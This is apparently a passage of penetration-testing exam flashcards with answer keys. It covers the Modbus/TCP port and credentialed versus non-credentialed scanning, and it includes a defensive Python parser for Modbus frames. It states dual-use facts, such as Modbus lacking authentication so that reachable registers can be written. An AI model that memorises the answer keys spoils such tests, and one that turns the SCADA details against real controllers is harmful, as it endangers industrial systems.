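```

Run on a real host the same two checks translate to reading /etc/crontab and /etc/cron.d/* and walking the exported share; the fix is to make the script root-owned and mode 755 (or stop running anything from a writable share as root).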

86
Q
In a SCADA system, Modbus typically operates on which of the following ports?
A.161/udp
B.502/tcp
C.902/tcp
D.3306/tcp
A

B.502/tcp

Explanation:
Modbus is a common Supervisory Control and Data Acquisition (SCADA) protocol; its TCP/IP variant, Modbus/TCP, operates on port 502/tcp. The protocol has no authentication or encryption, so anything that can reach port 502 can read and write the controller's registers.

A, C, and D are incorrect. A is incorrect because 161/udp is SNMP. C is incorrect because 902/tcp is used by VMware ESXi hosts. D is incorrect because 3306/tcp is MySQL.
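As an added example (not the book's or the flashcards' code), here is a parser for the Modbus/TCP framing seen on port 502: a 7-byte MBAP header (transaction id, protocol id which must be 0, length of the remainder, unit id) followed by the PDU (function code and data). It also flags write functions and exception responses, which is what a monitoring rule on a SCADA segment would key on. The frames fed to it are constructed.

```python
import struct

MODBUS_TCP_PORT = 502

FUNCTION_NAMES = {
    1: "Read Coils", 2: "Read Discrete Inputs", 3: "Read Holding Registers",
    4: "Read Input Registers", 5: "Write Single Coil", 6: "Write Single Register",
    15: "Write Multiple Coils", 16: "Write Multiple Registers",
}
WRITE_FUNCTIONS = {5, 6, 15, 16}     # state-changing: the ones to alert on from unexpected sources

def parse_modbus_tcp(frame: bytes) -> dict:
    """Decode MBAP header + PDU and sanity-check the framing."""
    if len(frame) < 8:
        raise ValueError("frame too short for MBAP header plus function code")
    txn, proto, length, unit = struct.unpack("!HHHB", frame[:7])
    if proto != 0:
        raise ValueError("protocol id must be 0 for Modbus/TCP")
    if length != len(frame) - 6:
        raise ValueError("length field (%d) disagrees with frame size" % length)
    fc = frame[7]
    data = frame[8:]
    func = fc & 0x7F
    result = {
        "transaction_id": txn,
        "unit_id": unit,
        "function": func,
        "name": FUNCTION_NAMES.get(func, "function %d" % func),
        "is_exception": bool(fc & 0x80),       # exception responses set the high bit
        "is_write": func in WRITE_FUNCTIONS,
        "data": data,
    }
    if result["is_exception"]:
        result["exception_code"] = data[0] if data else None
    elif func in (1, 2, 3, 4) and len(data) >= 4:
        result["start_address"], result["quantity"] = struct.unpack("!HH", data[:4])
    elif func in (5, 6) and len(data) >= 4:
        result["address"], result["value"] = struct.unpack("!HH", data[:4])
    return result

def build_request(txn: int, unit: int, function: int, *fields: int) -> bytes:
    """Build a request frame whose PDU is the function code followed by 16-bit fields."""
    pdu = struct.pack("!B%dH" % len(fields), function, *fields)
    return struct.pack("!HHHB", txn, 0, len(pdu) + 1, unit) + pdu

def build_read_holding_registers(txn: int, unit: int, start: int, quantity: int) -> bytes:
    return build_request(txn, unit, 3, start, quantity)
```

A passive rule that fires on is_write from any host other than the HMI, or on a burst of exception responses (a scanner walking addresses), gives useful visibility on a protocol that offers none itself.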

87
Q

What are the advantages of running a credentialed scan over running a non-credentialed scan?
(Choose all that apply)
A.Eliminates false positives
B.Provides a best guess at active services using null session scanning techniques
C.Configuration Auditing
D.Policy and compliance auditing

A

A.Eliminates false positives
C.Configuration Auditing
D.Policy and compliance auditing

Explanation:
A, C, and D are correct. A credentialed scan authenticates to the host (for example over SSH or SMB) and reads installed package versions, patch levels, registry keys, and configuration files directly, instead of inferring them from banners and response fingerprints, which sharply reduces false positives (and false negatives). That same local access is what makes configuration auditing (comparing settings against a hardening benchmark such as the CIS benchmarks) and policy/compliance auditing (PCI DSS, DISA STIG checks) possible.

B is incorrect because guessing at active services through null-session or banner techniques is exactly what a non-credentialed scan is limited to; a credentialed scan does not need to guess.